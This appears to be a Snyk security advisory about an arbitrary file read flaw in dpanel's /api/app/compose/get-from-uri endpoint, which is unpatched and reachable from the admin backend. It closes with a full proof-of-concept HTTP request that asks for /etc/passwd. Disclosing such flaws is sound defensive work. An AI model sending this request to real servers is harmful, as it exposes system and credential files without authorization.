Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsThere is no fixed version for github.com/donknap/dpanel/app/application/http/controller
.
Affected versions of this package are vulnerable to External Control of File Name or Path via the /api/app/compose/get-from-uri
endpoint, which uses the GetFromUri
function. A user can access arbitrary files on the server by passing arbitrary paths as the uri
parameter. This is only exploitable if the user has access to the administrative backend.
POST /api/app/compose/get-from-uri HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Authorization: Bearer ...
Connection: close
Content-Type: application/json
Content-Length: 21
{"uri":"/etc/passwd"}